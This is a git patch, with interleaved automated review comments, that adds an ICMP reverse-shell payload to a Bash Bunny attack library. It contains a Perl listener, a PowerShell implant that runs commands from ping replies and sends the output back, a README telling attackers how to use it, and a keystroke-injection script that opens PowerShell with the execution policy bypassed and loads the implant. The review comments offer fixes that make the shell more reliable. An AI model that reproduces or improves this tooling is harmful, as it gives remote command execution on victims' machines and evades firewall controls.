From 60f9b361f32943a508603583e5f128d4bc401ec7 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Sat, 11 Dec 2021 19:56:59 +0100
Subject: [PATCH] Uploaded pingUinBunny A reverse shell using icmp
---
 .../remote_access/pingUinBunny/Bunny.pl | 66 +++++++++++
 .../pingUinBunny/Invoke-pingUin.ps1 | 105 ++++++++++++++++++
 .../remote_access/pingUinBunny/README.md | 39 +++++++
 .../remote_access/pingUinBunny/payload.txt | 43 +++++++
 4 files changed, 253 insertions(+)
 create mode 100644 payloads/library/remote_access/pingUinBunny/Bunny.pl
 create mode 100644 payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1
 create mode 100644 payloads/library/remote_access/pingUinBunny/README.md
 create mode 100644 payloads/library/remote_access/pingUinBunny/payload.txt
diff --git a/payloads/library/remote_access/pingUinBunny/Bunny.pl b/payloads/library/remote_access/pingUinBunny/Bunny.pl
new file mode 100644
index 00000000..8807ebe9
--- /dev/null
+++ b/payloads/library/remote_access/pingUinBunny/Bunny.pl
@@ -0,0 +1,66 @@
+#!/usr/bin/env perl
+#
+# icmpsh - simple icmp command shell
+# Copyright (c) 2010, Nico Leidecker
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+#
+# Modified by 0iphor13 for pingUinBunny
+#
+#
+#
+#
+
+
+use strict;
+use IO::Socket;
+use NetPacket::IP;
+use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
+use Net::RawIP;
+use Fcntl;
+
+print "Bunny waitin' for his friend...\n";
+
+# create raw socket
+my $sock = IO::Socket::INET->new(
+ Proto => "ICMP",
+ Type => SOCK_RAW,
+ Blocking => 1) or die "$!";
+
+# set stdin to non-blocking
+fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
+
+print "Let's wait for PingUin!\n";
+
+my $input = '';
+while(1) {
+ if ($sock->recv(my $buffer, 4096, 0)) {
+ my $ip = NetPacket::IP->decode($buffer);
+ my $icmp = NetPacket::ICMP->decode($ip->{data});
+ if ($icmp->{type} == ICMP_ECHO) {
+ # get identifier and sequencenumber
+ my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
+
+ # write data to stdout and read from stdin
+ print $data;
+ $input = ;
+
+ # compile and send response
+ $icmp->{type} = ICMP_ECHOREPLY;
+ $icmp->{data} = pack("SSa*", $ident, $seq, $input);
+ my $raw = $icmp->encode();
+ my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
+ $sock->send($raw, 0, $addr) or die "$!\n";
+ }
+ }
+}
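Review bot: The listener answers whichever host pings it: nothing in the receive loop compares `$ip->{src_ip}` against the implant, so any ICMP echo request that reaches the raw socket has its payload printed to the operator's terminal and is answered with whatever the operator has typed on stdin. Take the implant address as an argument and skip everything else, e.g. `my $peer = shift @ARGV or die "usage: $0 <implant-ip>\n";` at startup and `next unless $ip->{src_ip} eq $peer;` right after the IP decode. `use Net::RawIP` is never referenced anywhere in the script and is also absent from the README's dependency list, so either drop the line or document it (Fcntl is used but likewise unlisted). `$input = ;` as rendered reads nothing — presumably `<STDIN>` was lost in extraction; if it is really missing the script does not compile, and even with it a non-blocking read with no pending input yields undef, which `pack` silently turns into an empty reply, a case worth a comment so operators know why an echo reply can carry no command.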
diff --git a/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1 b/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1
new file mode 100644
index 00000000..ab74e8ba
--- /dev/null
+++ b/payloads/library/remote_access/pingUinBunny/Invoke-pingUin.ps1
@@ -0,0 +1,105 @@
+function Invoke-pingUin
+{
+<#
+
+Original script by nishang - modified by 0iphor13 for pingUinBunny
+
+.PARAMETER IPAddress
+The IP address of the server/listener to connect to.
+
+.PARAMETER Delay
+Time in seconds for which the script waits for a command from the server. Default is 5 seconds.
+
+.PARAMETER BufferSize
+The size of output Buffer. Defualt is 128.
+
+.EXAMPLE
+# sysctl -w net.ipv4.icmp_echo_ignore_all=1
+# python icmpsh_m.py 192.168.254.226 192.168.254.1
+
+Microsoft please don't block, oh dear microsoft corporation
+#>
+ [CmdletBinding()] Param(
+
+ [Parameter(Position = 0, Mandatory = $true)]
+ [String]
+ $IPAddress,
+
+ [Parameter(Position = 1, Mandatory = $false)]
+ [Int]
+ $Delay = 5,
+
+ [Parameter(Position = 2, Mandatory = $false)]
+ [Int]
+ $BufferSize = 128
+
+ )
+
+ #Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
+ $ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
+ $PingOptions = New-Object System.Net.NetworkInformation.PingOptions
+ $PingOptions.DontFragment = $True
+ $MicrosoftCopyright =@"
+
+ I'll pingUin! <3
+ __
+ -=(o '.
+ '.-.\
+ /| \\
+ '| ||
+ by 0iphor13 _\_):,_
+
+ Windows PowerShell running as user $env:username on $env:computername `n
+"@;
+
+ # Copyright Copies Right
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+
+ #Show an interactive PowerShell prompt
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+
+ while ($true)
+ {
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
+ $reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
+
+ #Check for Command from the server
+ if ($reply.Buffer)
+ {
+ $response = ([text.encoding]::ASCII).GetString($reply.Buffer)
+ $result = (Invoke-Expression -Command $response 2>&1 | Out-String )
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
+ $index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
+ $i = 0
+
+ #Fragmant larger output into smaller ones to send to the server.
+ if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
+ {
+ while ($i -lt $index )
+ {
+ $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
+ $i +=1
+ }
+ $remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
+ if ($remainingindex -ne 0)
+ {
+ $NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
+ }
+ }
+ else
+ {
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+ }
+ $NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
+ $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
+ }
+ else
+ {
+ Start-Sleep -Seconds $Delay
+ }
+ }
+}
diff --git a/payloads/library/remote_access/pingUinBunny/README.md b/payloads/library/remote_access/pingUinBunny/README.md
new file mode 100644
index 00000000..3185dafb
--- /dev/null
+++ b/payloads/library/remote_access/pingUinBunny/README.md
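Review bot: Nothing validates the echo reply before `Invoke-Expression -Command $response` runs it: `if ($reply.Buffer)` is the only gate, so neither the reply status nor its source is ever checked, and anything on the path that can answer echo requests for $IPAddress gets command execution as this user. That is inherent to an unauthenticated ICMP channel, but the gate should at least be `if ($reply.Status -eq 'Success' -and $reply.Buffer)` and the help block should say plainly that the channel is cleartext and unauthenticated. The three Send calls inside the fragmentation branch use a `60 * 10000` timeout while every other call uses `60 * 1000`; if the extra zero is a typo, a single lost fragment stalls the shell for ten minutes. The `.PARAMETER Delay` text is inaccurate: the wait for a command is the hard-coded 60 s Send timeout, and $Delay is only the sleep between polls after an empty reply (also `Defualt` → `Default`). The remainder slice's upper bound `$NeverGonnaGiveYouUp.Length` is one past the last index; PowerShell appears to drop out-of-range slice indices so it works, but `.Length - 1` states what is meant.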
@@ -0,0 +1,39 @@
+**Title: pingUinBunny**
+
+Author: 0iphor13
+
+Version: 1.0
+
+What is pingUinBunny?
+#
+*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
+*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
+*ICMP stands for Internet Control Message Protocol; it is used by network devices’ query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
+*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
+*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
+*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (Invoke-pingUin.ps1) and sends it commands to execute.*
+#
+There you go, a reverse shell.
+
+Instruction:
+
+Upload Bunny.pl onto your attacking machine.
+Install dependencies, if needed:
+ IO::Socket,
+ NetPacket::IP,
+ NetPacket::ICMP
+
+Disable ICMP replies by the OS:
+ *sysctl -w net.ipv4.icmp_echo_ignore_all=1*
+
+Start Bunny.pl -> perl Bunny.pl
+#
+Plug in Bashbunny with pingUinBunny equipped.
+Achieve reverse shell.
+run away <3
+
+
+Credit for code and ideas:
+bdamele
+nishang
+krabelize
\ No newline at end of file
diff --git a/payloads/library/remote_access/pingUinBunny/payload.txt b/payloads/library/remote_access/pingUinBunny/payload.txt
new file mode 100644
index 00000000..10da7bbb
--- /dev/null
+++ b/payloads/library/remote_access/pingUinBunny/payload.txt
@@ -0,0 +1,43 @@
+#!/bin/bash
+#
+# Title: pingUinBunny
+# Description: Get remote access using a icmp reverse shell.
+# Author: 0iphor13
+# Version: 1.0
+# Category: Remote_Access
+# Attackmodes: HID, Storage
+
+LED SETUP
+
+DELAY 500
+
+GET SWITCH_POSITION
+DUCKY_LANG de
+
+DELAY 500
+
+ATTACKMODE HID STORAGE
+
+#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
+
+LED STAGE1
+
+DELAY 5000
+RUN WIN "powershell -Exec Bypass"
+DELAY 6000
+Q ENTER
+
+DELAY 10000
+Q STRING "Import-Module ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Invoke-pingUin.ps1')"
+DELAY 10000
+Q ENTER
+DELAY 10000
+Q STRING "Invoke-pingUin -IpAddress 0.0.0.0"
+DELAY 10000
+Q ENTER
+
+DELAY 5000
+
+ATTACKMODE HID
+
+LED FINISH
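Review bot: `Q STRING "Invoke-pingUin -IpAddress 0.0.0.0"` ships with a placeholder address and nothing in the file or the README says so, so the payload as committed points the implant at 0.0.0.0 instead of the host running Bunny.pl. Put the address in one clearly marked variable at the top, e.g. `# Set to the IP of the machine running Bunny.pl` followed by `ATTACKER_IP=0.0.0.0`, and type `Q STRING "Invoke-pingUin -IpAddress $ATTACKER_IP"`. `DUCKY_LANG de` hard-codes a German keyboard layout that the README never mentions; on a target with a different layout the `\` and `'` characters in the Import-Module line are likely to be typed wrong and the import fails silently. The `DELAY` values add up to roughly a minute with the Bunny plugged in and visible as a storage volume, which may be deliberate for slow hosts but deserves a comment so operators can tune it.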